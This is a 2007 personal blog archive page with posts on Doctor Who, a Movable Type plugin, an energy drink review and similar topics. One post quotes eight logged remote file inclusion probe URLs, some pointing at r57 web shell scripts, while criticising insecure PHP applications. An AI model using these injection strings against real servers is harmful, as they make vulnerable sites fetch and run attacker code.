MainDoctor WhoMusicSoftware
Main Page

Alden Bates' Weblog

June 2007 Archives

June 25, 2007

PHP and Security Holes

Filed in: Website Management.

Watch out - I'm about to make myself sound like a snob. :)

What is it about PHP that spawns applications with security holes? My site gets hit a lot by people/bots probing for security holes, and said hack attempts exclusively include "php" somewhere in the URL. Witness a smattering of hack attempts that have occurred recently:

  • /index.php?plugin=http://perdu.ch/cgi-bin/echo?
  • ///plugin/HP_DEV/cms2.php?s_dir=http://secretagent.by.ru/r57.php??
  • /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.kebcomputer.com/cache/tests.txt??
  • /get_session_vars.php?path_to_smf=http://www.eclypse.info/oche?
  • /archives/2005/bridges/SMF/logout.php?path_to_smf=http://utenti.lycos.it/r57/stringa.txt?
  • /index.php3?p=http://www.freewebs.com/enemyownz/id.txt?
  • /index.php3?i=http://80.201.236.78/~pat/evilx?
  • /plugins/%3Cwbr%20/%3Epagedarchives.html/index.php?page=http://www.techgoiania.com.br/components/com_juice/canboy1?

As an aside, even an idiot could see that last URL wouldn't work. Evidently the tool used to probe it was written by a chimp. But I digress.

What's with all the security holes in PHP apps? Is it just that PHP is so popular for web development that it has the same problem as Windows (the majority use it, so hacks are more common)? Of course, all of the URLs there have something in common - they obviously count on the application in question using input from the end user without validating it first. Is there something in PHP which tends to encourage this sort of thing, or just that it's so widely used that it attracts more lazy programming?

Of course, both Wordpress and Movable Type (both applications which I use on this site) have had security holes - one uses PHP, the other uses Perl, and both are written to a very high standard. Both are also widely used, which suggests to me that PHP is a victim of its own success. Like Windows, they're so common that any security holes are highly sought after by hackers.

That said, I'd be extremely hesitant about installing any other PHP applications here...

Posted at 8:34 PM | Comments (2)

June 24, 2007

So where did blogwise go?

Filed in: Weblogging.

I noticed the other day that one of the larger blog directories, blogwise.com, seems to have gone bye bye. The domain's still registered, but resolves to 0.0.0.0 and the most recent cached pages I can find in Google are from late April. Is it an... ex-directory? Seriously, what the heck's happened there?

Posted at 10:25 PM | Comments (0)

June 19, 2007

Midi to Wav conversion

Filed in: Computers, Links.

You know, I swear back in the early days of the internet if you wanted something like, oh, a program to convert a midi file into a wav file, you could just go look on your favourite FTP site and download a tiny DOS program which would do it. Does anyone else remember those days? Now it seems like all the programs on offer for doing this require you to fork out $25. WTF?

I wanted to convert a midi file to a wav file, so I took the following steps:

  1. Downloaded one of the many shareware midi2wav converters.
  2. Ran the installer.
  3. Ran up the software.
  4. Discovered that pressing ENTER in the software would quit out of it without prompting "Are you sure you want to quit?"
  5. Restarted the software, attempted the conversion, got a cryptic error.
  6. Figuring the previous attempt had locked some audio drivers, rebooted the PC.
  7. Reran the program - discovered that the cryptic error actually meant the target directory I'd specified didn't exist. Converted the file.
  8. Played the resulting output file, to discover that the shareware software had produced a 1 minute long, completely silent wav file.
  9. Uninstalled the software.

Is this is how software works these days? You download it, install it, and hope it works and doesn't deposit any spyware on your PC? Man.

I got the midi file converted in the end, thanks to a page which gave instructions on converting midi files to wav files using Winamp.

Posted at 9:51 PM | Comments (5)

June 16, 2007

Paged Archives v1.30

Filed in: Movable Type.

This release adds in a MTPAEntryLink tag, which is a paging-aware version of the standard MTEntryLink tag - you can use it to link to the Monthly or Category archive page which an entry appears on. It assumes you're not using the MTPASettings tag to alter the number of items per page, and that the items are in reverse chronological order. I might add an argument later to allow for forward ordering as well. This tag was requested by Blogosfere.

According to the MT wiki MT4 plugin compatability list, PagedArchives is compatible with Movable Type 4* - hopefully nothing in this release breaks that. I haven't downloaded the version 4 beta to look at yet.

You can download this plugin on the Paged Archives page.

* Though it would have been nice if it was listed in the "rendered obsolete" section.

Posted at 4:46 PM | Comments (49)

June 15, 2007

Kinja Tags

Filed in: Weblogging.

I happened upon the Kinja page for this weblog (they haven't updated the URL, despite the 301 redirect, but that's not uncommon - Technorati have it listed twice) and noticed that Kinja pages seem to have a list of links along the top to subjects related to the blog they're indexing. The list of links for mine reads:
search - yahoo - conservative - featured - google - gossip - media - new york - open source - security

From what I can gather from Kinja's help pages, these are tags applied by site users, so it appears someone there thinks my weblog is New York related... Maybe it's because I've written about Moby a couple of times? And what does "featured" mean?

Most of the others I can see, but "conservative"? I hardly ever write about political stuff! #drwhochat, an IRC channel I've hung around in forever, has a rule about no political discussion because they never end well, and that's a rule I've brought over to here, because I really like avoiding flame wars.

That's a very confusing listing.

Edit: I contacted Kinja and they've corrected the URL on the listing - cool! Thanks, guys! :)

Posted at 9:00 PM | Comments (0)

June 13, 2007

Webcomic: Jesus versus Doctor Who

Filed in: Links.

Jesus versus Doctor Who

And, lo, the people rejoiced, and the Doctor said unto them "Fantastic!"

Posted at 6:44 PM | Comments (1)

June 11, 2007

Energy Drink Review: Go Fast!

Filed in: Energy Drinks.

[Go Fast!]Go Fast! appears to be an American product, though this can seems to have been imported from Australia. It contains Australian Honey ("The best honey for optimum taste" - my inner Kiwi is making a face right now), taurine, ginseng, vitamin B6, vitamin B12, ginkgo biloba, guarana, riboflavin, niacin, and milk thistle herb ("provides good kidney and liver health"). Quite what the cumulative effects of these ingredients is likely to be, I'm not sure. It sounds like a mad scientist's idea of how to make an energy drink. It also describes itself as "The athlete's energy drink" (Note that in general caffeine plus exercise is not recommended).

It tastes... very tangy. There's a definite hint of honey there, but the main flavour is very harsh and sharp, not unlike Red Bull, and with the same lingering aftertaste (albeit still with a hint of honey).

Posted at 7:06 PM | Comments (2)

June 9, 2007

TSV 47

Filed in: Doctor Who, TSV Online.

Today TSV 47 went online, and there's a substantial bias towards the books this issue, with an article on the making of Just War, an interview with David Bishop on his novel Who Killed Kennedy, and an article on items cut from the DisContinuity Guide, as well as the already-online Not So New Adventures article on Transit. There are articles touching on other topics, such as Paul Scoones' piece on the aborted Doctor Who: The Motion Picture.

There's also another installment of Tardis Tales and one of my favourite of the TSV comic strips, a post-War Games second Doctor adventure named Hyperborea, written by David Ronayne and drawn by Peter Adamson. Speaking of which, David's letter says he was situated in Ulaan Baatar, Outer Mongolia - what was up with that?! There's also a letter from one Alden Bates writing about the rumour that the Doctor would reveal in the Paul McGann TV Movie that he was half-human. As it turns out, sometimes rumours can be true... These days, that letter would have needed a spoiler warning on it. :)

Next issue: lots and lots about the TV Movie!
See also: write-ups by Paul and Jamas!
Previously: TSV 46

Posted at 5:28 PM | Comments (2)

June 8, 2007

Doctor Who Series 3 (episodes 6 - 9)

Filed in: Doctor Who.

This time on Doctor Who, things take a turn for the better! Spoilers ahead:

Continue reading "Doctor Who Series 3 (episodes 6 - 9)"

Posted at 8:39 PM | Comments (2)

June 5, 2007

The Street Value of Feijoas

Filed in: Tetrap.Local.

I was walking back to work from a shop this afternoon when a random passerby asked "Are you into feijoas?" and opened his bag to show off a plastic bag full of them. At that point I was starting to wonder if I'd stepped into a bizarre Twilight Zone where fejoas were illegal street drugs and was going to ask if they were pure. Instead I opted to say "Uh, no thanks" and walk on before he started pushing oranges or something. Surreal!

Posted at 8:21 PM | Comments (0)

June 3, 2007

Some random things

Filed in: Misc.

  • I attended the Conspiracy II convention yesterday. The convention is on all Queen's birthday weekend. Among the panels I went to were A History of New Zealand Science Fiction Comics: 1928-2007 and ESP 101. The first was very interesting, as I didn't know a hell of a lot about comics in NZ, outside those which appeared in the Listener and TSV. The latter turned out to be a practical workshop, where we rolled dice and attempted to use pendulums to detect coins hidden under books, and the contents of tin cans. I found I have no ESP ability whatsoever.
  • LiveJournal, last week, purged a whole pile of journals reported by a Neo-Nazi group for being paedophiles - many weren't and users were unhappy. Go figure.
  • Kiwi DW fanzine Reverse the Polarity is turning their web site into a blog. I got RTP issue 24 in the mail recently, and it was great!
  • As you may have noticed, the Tetrap picture on my weblog has changed. The new one was inspired by a similar image on the layout of a blog I saw on Blog Explosion (Write on Track, I think).

Posted at 10:23 AM | Comments (0)

Search


Archives

Tetrap.com Site Map